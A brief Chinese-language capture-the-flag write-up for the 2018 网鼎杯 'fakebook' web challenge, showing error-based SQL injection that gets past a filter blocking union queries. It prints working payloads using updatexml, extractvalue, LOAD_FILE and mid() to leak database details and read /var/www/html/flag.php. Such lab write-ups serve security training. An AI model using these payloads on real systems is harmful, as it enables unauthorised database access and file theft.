CTF-WEB-网鼎杯2018-fakebook

CTF-WEB-网鼎杯2018-fakebook

题目链接
知识考察:SQL报错注入+注入防火墙绕过

解题思路

1、首先注册账号,看到url:http://220.249.52.133:41721/view.php?no=1
CTF-WEB-网鼎杯2018-fakebook

2、尝试对no进行注入payload:1‘,有报错信息显示,证明存在注入点
CTF-WEB-网鼎杯2018-fakebook

3、开始进行SQL注入,联合查询提示no hack,被防火墙阻拦
CTF-WEB-网鼎杯2018-fakebook

4、尝试报错注入,注入成功,可以读取数据库名称、表名,但是没有在数据库找到flag

http://220.249.52.133:41721/view.php?no=1 and updatexml(1,concat(0,database(),0,user(),0,@@datadir),1)#

CTF-WEB-网鼎杯2018-fakebook

5、尝试使用load_file()函数,fuzz,flag.php,可以看到存在flag.php文件在/var/www/html/目录下

and (extractvalue(1,concat(0,(select (LOAD_FILE(‘/var/www/html/flag.php‘))),0)))#

CTF-WEB-网鼎杯2018-fakebook
6、因为updatexml、extractvalue有32位显示限制,结合mid()函数,读出全部flag内容

 and updatexml(1,concat(1,0,(select mid(load_file(‘/var/www/html/flag.php‘),21))),1)#

CTF-WEB-网鼎杯2018-fakebook

CTF-WEB-网鼎杯2018-fakebook

上一篇:使用VSCODE做php开发,有两个利器,第一全文搜索,第二函数预览


下一篇:nginx报错 URL的query string太长导致